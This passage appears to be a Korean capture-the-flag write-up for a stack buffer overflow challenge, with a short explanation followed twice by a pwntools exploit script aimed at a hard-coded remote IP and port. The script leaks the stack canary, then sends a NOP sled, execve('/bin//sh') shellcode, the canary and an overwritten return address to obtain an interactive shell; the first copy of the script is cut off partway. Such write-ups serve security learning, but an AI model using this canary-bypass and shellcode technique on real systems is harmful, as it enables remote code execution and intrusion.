

버퍼 주소, RBP, Canary 주소까지 모두 알려준다.
이후 입력 부분이 buffer에 들어가는 걸 확인할 수 있다.
위 정보들을 활용하여
from pwn import *
p = remote("43.200.163.250", 31339)
context.log_level = "debug"
context.arch = "amd64"
def slog(name, addr): return success("{}: {}".format(name, hex(addr)))
#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098
p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)
p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)
p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)
p.recvuntil("input: ")
shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
Canary_Address, Buffer_Address, RBP_Address
입력을 받아 해당 주소를 받는다.
위 정보들을 총합하여 Nop-Sled 공격기법을 활용하여 RIP주소를 조작하면 된다.
from pwn import *
p = remote("43.200.163.250", 31339)
context.log_level = "debug"
context.arch = "amd64"
def slog(name, addr): return success("{}: {}".format(name, hex(addr)))
#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098
p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)
p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)
p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)
p.recvuntil("input: ")
shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
#Buffet2Canary Offset
offset = rbp_addr-buffer_addr
slog("offset : buffer <=> rbp", offset)
#LEAK_CANARY
leak_canary = b'A'*0x89
p.send(leak_canary)
p.recvuntil(leak_canary)
canary = u64(b'\x00'+p.recv(7))
print()
print("*"*30 + " Address " + "*"*30)
print()
slog("buffer_addr", buffer_addr)
slog("rbp_addr", rbp_addr)
slog("canary_addr", canary_addr)
print()
print("*"*30 + " Offset " + "*"*30)
print()
slog("rbp <=> buffer", rbp_addr-buffer_addr)
slog("Buffer <=> canary", canary_addr-buffer_addr)
slog("rbp <=> canary", rbp_addr-canary_addr)
print()
print("*"*30 + " Stack " + "*"*30)
print()
slog("canary", canary)
p.recvuntil("input: ")
#FINAL_PEXPLOIT
way = 0x88-len(shellcode)
print(hex(way))
payload = b'\x90'*(0x88-len(shellcode))
payload += shellcode
payload += p64(canary)
payload += b'\x90'*8
payload += p64(buffer_addr)
p.send(payload)
p.interactive()
